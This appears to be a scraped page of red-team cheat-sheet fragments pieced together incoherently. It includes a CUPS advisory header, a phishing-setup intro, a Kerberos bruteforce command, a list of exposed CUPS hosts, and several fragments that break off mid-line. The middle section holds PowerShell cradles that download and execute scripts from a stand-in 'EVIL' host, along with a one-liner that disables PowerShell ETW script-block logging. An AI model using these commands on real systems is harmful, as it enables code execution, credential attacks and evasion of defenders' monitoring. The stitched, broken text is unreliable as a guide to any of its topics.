Christopher CalfCrusher

list of contents

Infrastructure
- Redirectors
- Domain fronting
OpSec
- Customer ID
Payloads
- DNS Beacon
SMB Beacon

Original report

Affected Vendor: OpenPrinting
Affected Product: Several components of the CUPS printing system: cups-browsed, libppd, libcupsfilters and cups-filters.
Affected Version: All versions <= 2.0.1 (latest release) and master.
Significant ICS/OT impact? no
Reporter: Simone Margaritelli [[email protected]]
Vendor contacted? yes The vendor has been notified trough Github Advisories and all bugs have been confirmed:

https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8

Red Team Phishing with Gophish

This guide will help you set up a red team phishing infrastructure as well as creating, perform and evaluate a phishing campaign. This is the basic lifecycle of your phishingn campaign:

+---------------------+
|Get Hardware         |   Order / setup a vServer
+---------------------+
+---------------------+
|Setup                |   Install Gophish & Mail Server
+---------------------+

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

	# pip install pycdlib

	try:
	from cStringIO import StringIO as BytesIO
	except ImportError:
	from io import BytesIO

	import pycdlib

	iso = pycdlib.PyCdlib()

	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object

	ip,user_agent
	116.202.x.x,CUPS/2.2.10 (Linux 4.19.0-17-amd64; x86_64) IPP/2.0
	212.235.x.x,CUPS/2.2.7 (Linux 4.15.0-213-generic; x86_64) IPP/2.0
	202.188.x.x,CUPS/2.3.3op2 (Linux 5.10.0-23-amd64; x86_64) IPP/2.0
	202.188.x.x,CUPS/2.3.3op2 (Linux 5.10.0-23-amd64; x86_64) IPP/2.0
	5.9.x.x,CUPS/2.2.7 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
	147.203.x.x,CUPS/2.2.7 (Linux 4.15.0-176-generic; x86_64) IPP/2.0
	60.191.x.x,CUPS/2.2.12 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
	64.62.x.x,CUPS/2.2.12 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
	103.234.x.x,CUPS/2.4.1 (Linux 5.15.0-118-generic; x86_64) IPP/2.0

	POST /druid/indexer/v1/sampler HTTP/1.1
	Host: x.x.x.x:8888
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
	Accept: application/json, text/plain, /
	Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
	Content-Type: application/json
	Content-Length: 1045
	Connection: close

	Add-Type -OutputAssembly hello.exe -TypeDefinition @'
	using System;

	public class Hello {
	public static void Main(string[] Args) {
	System.Console.WriteLine("Hello, world!");
	System.Console.Read();
	}
	}
	'@

	#
	# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
	# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
	# to bypass Suspicious ScriptBlock Logging for readability.
	#
	[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)